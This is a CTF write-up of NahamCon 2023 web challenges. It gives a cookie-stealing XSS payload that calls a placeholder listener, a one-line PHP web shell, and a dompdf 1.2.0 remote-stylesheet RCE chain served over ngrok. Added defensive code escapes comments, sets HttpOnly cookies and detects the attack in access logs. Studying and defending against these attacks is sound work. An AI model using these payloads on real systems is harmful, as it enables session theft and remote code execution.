Nahamcon CTF 2023 - Web

The third time we attempted the Nahamcon CTF, we didn't have as much availability as a team, and I ended up jumping on web with 8 hours left.

Web Challenges

Hidden Figures

[image: challenge description]

I tried to fuzz the website for the common easy stuff, then tried to carve more files out of the images.

Here’s how it turned out:

[image: "Thank you mario" (flag)]


[image: challenge description]

This was a blog with only one post and a comment feature. Here’s my go-to payload for stealing cookies with XSS (<YOUR_IP> and <YOUR_PORT> are placeholders for your listener):

<img src=x onerror=this.src='http://<YOUR_IP>:<YOUR_PORT>/?'+document.cookie;>

Good thinking, because apparently the admin will have a look at my comment.

[image: "admin will check shortly"]

[image: receiving the admin cookie on the listener]

With this I managed to send myself the admin cookie and simply replaced it in the browser. This revealed an Admin menu and the flag.
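The defender's side of this challenge, as an added example that is not part of the writeup: the comment is concatenated into the page unescaped, and the session cookie is readable from document.cookie. The code below reproduces the vulnerable rendering next to the escaped version, flags the markup shapes a comment never legitimately needs (for alerting or a review queue), and builds a Set-Cookie header with HttpOnly so that even a script that does run cannot read the session. The sample comments and the host attacker.example are constructed; the function names are my own.

```python
import html
import re

# Constructed sample comments (not from the challenge): a benign one, the
# image/onerror cookie-stealing payload shape from the writeup with a placeholder
# host, and a script-tag variant.
SAMPLE_COMMENTS = [
    "Great post, thanks!",
    "<img src=x onerror=this.src='http://attacker.example/?'+document.cookie;>",
    "<script>fetch('http://attacker.example/?c='+document.cookie)</script>",
]

# Markup a comment never legitimately needs: script tags, inline event handlers
# and javascript: URLs. Good for review queues and alerting, not a sole defence.
SUSPICIOUS = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "event-handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript-url": re.compile(r"javascript\s*:", re.I),
}


def flag_suspicious(comment: str) -> list:
    """Names of the suspicious patterns found in a submitted comment."""
    return [name for name, pat in SUSPICIOUS.items() if pat.search(comment)]


def render_comment_vulnerable(comment: str) -> str:
    """The blog's bug, reproduced: comment text is pasted straight into the HTML."""
    return f"<div class='comment'>{comment}</div>"


def render_comment_safe(comment: str) -> str:
    """Escape for the HTML text context: the markup is displayed, never parsed."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def session_cookie_header(value: str) -> str:
    """Set-Cookie for the admin session. HttpOnly keeps it out of
    document.cookie, so the exfiltration above gets nothing even if a script
    does run; Secure and SameSite limit where the browser sends it."""
    return f"Set-Cookie: session={value}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    for c in SAMPLE_COMMENTS:
        print(flag_suspicious(c))
        print(render_comment_vulnerable(c))
        print(render_comment_safe(c))
    print(session_cookie_header("opaque-random-session-id"))
```

Output escaping is the fix; the pattern list is only there to notice attempts. HttpOnly does not stop XSS, but it removes the cookie-theft outcome this challenge relied on, which is why both layers belong together.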



[image: challenge description]

We are met with a form that generates a PDF file at quote.php, with all the form fields appended to the URL as query parameters.

[image: a form to buy stickers]

[image: PDF metadata showing "dompdf 1.2.0 + CPDF"]

This PDF was generated with dompdf 1.2.0 + CPDF. I had already downloaded and played with this exploit from GitHub before, from positive-security, so I felt at home, even without a VPN. I just modified the original files with my details as shown below, and served them with ngrok.

😉 winking at htb players.


exploit.css (only the opening line is shown here; the full file content is available in the GitHub repo):

@font-face {

exploit_font.php:

<?php system($_REQUEST['cmd']); ?>

This excellent blog post from details very precisely what we’re going to do next. The following payload goes into the URL as is, as the value of the organization parameter:

organization=<link rel=stylesheet href='https://<your-ngrok-url>/exploit.css'>&...

[image: grabbing the MD5 hash of the file URL, as the app does]

Don’t forget to grab the MD5 hash of your exploit_font.php URL (the app uses it to name the cached font file) with this command:

echo -n 'https://<your-ngrok-url>/exploit_font.php' | md5sum

or by running this Python code as per the article:

import hashlib

# the URL of the hosted font file, exactly as the app will fetch it (replace the placeholder)
url = 'https://<your-ngrok-url>/exploit_font.php'
print(hashlib.md5(url.encode()).hexdigest())

At this point I decided to fuzz the URL, to make extra sure I would have the correct file path, and confirmed the environment had a path /dompdf/lib/fonts/ where my exploit_font would be uploaded, from exploit.css.

Since we decided to add a cmd parameter, let’s include it in our URL:

We can see the content of the exploit_font.php file, along with the output of our PHP command (containing the flag).

[image: output of cat flag.txt]
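From the blue-team side, the chain above leaves two very recognisable traces in the web server's access log: a quote.php request whose form field carries a remote stylesheet or font reference, and a later request for a PHP file under /dompdf/lib/fonts/. The following detection script is an added example, not part of the writeup or of the dompdf project; it parses constructed combined-format log lines (the IP, timestamps, the example.invalid host and the cached file name are all made up) and reports the lines that match either pattern.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access log lines (not from the challenge host):
# a normal quote request, a quote whose organization field smuggles a remote
# stylesheet, and a follow-up request executing a PHP file from the font cache.
# The cached file name is a made-up placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Jun/2023:10:01:02 +0000] "GET /quote.php?organization=ACME&qty=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Jun/2023:10:01:40 +0000] "GET /quote.php?organization=%3Clink+rel%3Dstylesheet+href%3D%27https%3A%2F%2Fexample.invalid%2Fexploit.css%27%3E&qty=1 HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Jun/2023:10:02:15 +0000] "GET /dompdf/lib/fonts/placeholder_font_0123abcd.php?cmd=id HTTP/1.1" 200 87 "-" "curl/8.1.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Anything script-like being requested from the font cache directory.
FONT_CACHE_SCRIPT = re.compile(r"^/dompdf/lib/fonts/.*\.(php\d?|phtml|phar)(\?|$)", re.I)
# PDF input that pulls in a remote stylesheet or font.
REMOTE_RESOURCE = re.compile(r"<link\b[^>]*stylesheet|@font-face|\burl\s*\(", re.I)


def parse_line(line: str):
    """Split one combined-format line into named fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict) -> list:
    """Reasons this request looks like dompdf abuse; empty when it looks normal."""
    path, _, query = entry["target"].partition("?")
    reasons = []
    if FONT_CACHE_SCRIPT.match(entry["target"]):
        reasons.append("script requested from dompdf font cache")
    if path.endswith("/quote.php") and REMOTE_RESOURCE.search(unquote_plus(query)):
        reasons.append("PDF form input references a remote stylesheet or font")
    return reasons


def scan(log_text: str) -> list:
    """(ip, target, reasons) for every line that triggers at least one rule."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            alerts.append((entry["ip"], entry["target"], reasons))
    return alerts


if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(ip, target, "->", "; ".join(reasons))
```

The second rule only sees the query string because this app puts the form fields in the URL; for a POST form the same check has to run on the request body, at the application or WAF layer. On the mitigation side, dompdf's isRemoteEnabled option controls whether remote stylesheets and fonts are fetched at all, the font cache directory should never be served with PHP execution enabled, and the dompdf version shown in the PDF metadata is the first thing to update.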

by Starry-Lord 18.06.23